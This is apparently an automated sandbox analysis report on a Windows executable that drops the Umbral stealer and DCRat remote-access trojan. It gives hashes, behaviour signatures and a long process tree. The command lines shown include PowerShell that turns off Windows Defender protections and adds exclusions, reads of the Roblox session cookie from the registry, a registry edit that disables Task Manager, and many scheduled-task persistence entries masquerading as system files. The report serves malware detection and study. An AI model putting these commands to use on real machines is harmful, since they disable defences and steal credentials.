Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-05-2024 01:28

General

  • Target

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

  • Size

    4.3MB

  • MD5

    898a94f29edc228ce3bd2054f3d5d6dd

  • SHA1

    f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

  • SHA256

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

  • SHA512

    8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

  • SSDEEP

    49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Umbral payload 3 IoCs
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 18 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 54 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 17 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
    "C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Users\Admin\AppData\Local\Temp\stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        3⤵
        • Views/modifies file attributes
        PID:4556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1588
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3844
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:3856
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2012
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1772
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:3676
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3680
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • Runs ping.exe
              PID:3916
        • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
          "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2876
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4128
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1072
              • C:\MsWinsessiondllNet\driverBrokercommon.exe
                "C:\MsWinsessiondllNet\driverBrokercommon.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3532
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5028
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    7⤵
                      PID:3444
                    • C:\Users\All Users\OfficeClickToRun.exe
                      "C:\Users\All Users\OfficeClickToRun.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:4940
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs"
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1496
                        • C:\Users\All Users\OfficeClickToRun.exe
                          "C:\Users\All Users\OfficeClickToRun.exe"
                          9⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Modifies registry class
                          • Suspicious use of WriteProcessMemory
                          PID:1684
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs"
                            10⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3968
                            • C:\Users\All Users\OfficeClickToRun.exe
                              "C:\Users\All Users\OfficeClickToRun.exe"
                              11⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Modifies registry class
                              • Suspicious use of WriteProcessMemory
                              PID:1156
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs"
                                12⤵
                                  PID:4372
                                  • C:\Users\All Users\OfficeClickToRun.exe
                                    "C:\Users\All Users\OfficeClickToRun.exe"
                                    13⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    PID:2256
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs"
                                      14⤵
                                        PID:2532
                                        • C:\Users\All Users\OfficeClickToRun.exe
                                          "C:\Users\All Users\OfficeClickToRun.exe"
                                          15⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Modifies registry class
                                          PID:1112
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs"
                                            16⤵
                                              PID:4968
                                              • C:\Users\All Users\OfficeClickToRun.exe
                                                "C:\Users\All Users\OfficeClickToRun.exe"
                                                17⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                PID:5016
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs"
                                                  18⤵
                                                    PID:3596
                                                    • C:\Users\All Users\OfficeClickToRun.exe
                                                      "C:\Users\All Users\OfficeClickToRun.exe"
                                                      19⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Modifies registry class
                                                      PID:3008
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs"
                                                        20⤵
                                                          PID:2328
                                                          • C:\Users\All Users\OfficeClickToRun.exe
                                                            "C:\Users\All Users\OfficeClickToRun.exe"
                                                            21⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Modifies registry class
                                                            PID:2608
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs"
                                                              22⤵
                                                                PID:2628
                                                                • C:\Users\All Users\OfficeClickToRun.exe
                                                                  "C:\Users\All Users\OfficeClickToRun.exe"
                                                                  23⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Modifies registry class
                                                                  PID:1480
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs"
                                                                    24⤵
                                                                      PID:3012
                                                                      • C:\Users\All Users\OfficeClickToRun.exe
                                                                        "C:\Users\All Users\OfficeClickToRun.exe"
                                                                        25⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        PID:424
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs"
                                                                          26⤵
                                                                            PID:3732
                                                                            • C:\Users\All Users\OfficeClickToRun.exe
                                                                              "C:\Users\All Users\OfficeClickToRun.exe"
                                                                              27⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Modifies registry class
                                                                              PID:3760
                                                                              • C:\Windows\System32\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs"
                                                                                28⤵
                                                                                  PID:2024
                                                                                  • C:\Users\All Users\OfficeClickToRun.exe
                                                                                    "C:\Users\All Users\OfficeClickToRun.exe"
                                                                                    29⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Modifies registry class
                                                                                    PID:648
                                                                                    • C:\Windows\System32\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs"
                                                                                      30⤵
                                                                                        PID:4780
                                                                                        • C:\Users\All Users\OfficeClickToRun.exe
                                                                                          "C:\Users\All Users\OfficeClickToRun.exe"
                                                                                          31⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Modifies registry class
                                                                                          PID:2168
                                                                                          • C:\Windows\System32\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\90768ac9-f677-4eca-bfa6-2c2289da3535.vbs"
                                                                                            32⤵
                                                                                              PID:2644
                                                                                              • C:\Users\All Users\OfficeClickToRun.exe
                                                                                                "C:\Users\All Users\OfficeClickToRun.exe"
                                                                                                33⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Modifies registry class
                                                                                                PID:1676
                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4fb73f37-69ab-4c36-839e-63fba0405246.vbs"
                                                                                                  34⤵
                                                                                                    PID:700
                                                                                                  • C:\Windows\System32\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\964d59a8-da7c-427a-9df7-83d092a74dec.vbs"
                                                                                                    34⤵
                                                                                                      PID:3732
                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b3188dd-0e79-4205-9c12-221b928853cf.vbs"
                                                                                                  32⤵
                                                                                                    PID:4332
                                                                                              • C:\Windows\System32\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9631333a-2d67-4b6c-ab49-1152cf25e131.vbs"
                                                                                                30⤵
                                                                                                  PID:1260
                                                                                            • C:\Windows\System32\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23970f29-63ea-4a42-89d3-82a0294c6654.vbs"
                                                                                              28⤵
                                                                                                PID:2604
                                                                                          • C:\Windows\System32\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65e39de4-b06e-47c9-a366-406fdb705992.vbs"
                                                                                            26⤵
                                                                                              PID:1912
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52c39398-c77a-4017-b39e-c4305685083f.vbs"
                                                                                          24⤵
                                                                                            PID:3572
                                                                                      • C:\Windows\System32\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\247a55d3-4a2a-4013-90a7-551e0dba8375.vbs"
                                                                                        22⤵
                                                                                          PID:1072
                                                                                    • C:\Windows\System32\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a46ec459-c490-4bc4-95f6-b2f98b27fed0.vbs"
                                                                                      20⤵
                                                                                        PID:1600
                                                                                  • C:\Windows\System32\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92b637a2-a0f8-4de9-8f88-3395212ea9ff.vbs"
                                                                                    18⤵
                                                                                      PID:3908
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9553ac34-d8bb-4793-9745-28b9055e89ec.vbs"
                                                                                  16⤵
                                                                                    PID:2680
                                                                              • C:\Windows\System32\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9845c9f8-f68f-44c0-8a0f-ab509582ad2d.vbs"
                                                                                14⤵
                                                                                  PID:4436
                                                                            • C:\Windows\System32\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1fd5334d-3292-4a4f-ba80-ecac0649ffbc.vbs"
                                                                              12⤵
                                                                                PID:2876
                                                                          • C:\Windows\System32\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc73393a-21db-4920-aef5-89bb6e511a85.vbs"
                                                                            10⤵
                                                                              PID:2380
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs"
                                                                          8⤵
                                                                            PID:4132
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                      5⤵
                                                                      • Modifies registry key
                                                                      PID:5064
                                                              • C:\Users\Admin\AppData\Local\Temp\Inject.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:4460
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1000
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1168
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2832
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1280
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2924
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1684
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1440
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1436
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4968
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2044
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:408
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4580
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:424
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:5064
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3444
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:404
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4768
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3512
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2084
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4604
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2292
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:64
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4564
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4740
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3540
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2488
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4596
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2876
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3012
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4316
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4452
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3868
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4720
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4404
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3308
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2388
                                                            • C:\Windows\system32\schtasks.exe
